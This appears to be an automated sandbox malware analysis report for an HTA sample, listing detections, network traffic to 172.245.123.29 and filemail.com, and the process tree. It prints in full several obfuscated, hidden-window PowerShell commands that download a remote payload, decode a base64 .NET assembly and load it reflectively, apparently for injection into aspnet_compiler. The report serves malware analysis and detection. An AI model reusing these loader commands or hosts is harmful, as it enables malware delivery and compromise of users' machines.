sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline", ProcessId: 7580, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-28T18:50:24.269477+010028587951A Network Trojan was detected192.168.2.449730172.245.123.2980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFAvira URL Cloud: Label: malware
        Source: seemebestthings.htaReversingLabs: Detection: 21%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability

        Phishing

        barindex
        Source: Yara matchFile source: seemebestthings.hta, type: SAMPLE
        Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb[ source: powershell.exe, 00000009.00000002.1834846594.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.pdb source: powershell.exe, 00000003.00000002.1798045854.0000000005027000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1834846594.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbx source: powershell.exe, 00000009.00000002.1824816604.00000000032F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000009.00000002.1824816604.00000000032F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: CallSite.Target.pdbH source: powershell.exe, 00000009.00000002.1836478008.00000000087EF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: l\mscorlib.pdb source: powershell.exe, 00000009.00000002.1836478008.00000000087EF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 172.245.123.29:80
        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.29Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04BA7A18 URLDownloadToFileW,3_2_04BA7A18
        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.29Connection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
        Source: powershell.exe, 00000003.00000002.1798045854.0000000005027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seeme
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
        Source: powershell.exe, 00000003.00000002.1803659216.0000000008429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFb
        Source: powershell.exe, 00000007.00000002.1845149859.0000000007210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
        Source: powershell.exe, 00000003.00000002.1799696139.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839467704.0000000004B9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826086486.0000000005271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000003.00000002.1803659216.0000000008429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.P
        Source: powershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
        Source: powershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839467704.0000000004B79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839467704.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826086486.0000000005271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000009.00000002.1826086486.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000003.00000002.1803659216.00000000084A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000003.00000002.1799696139.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2

        System Summary

        barindex
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
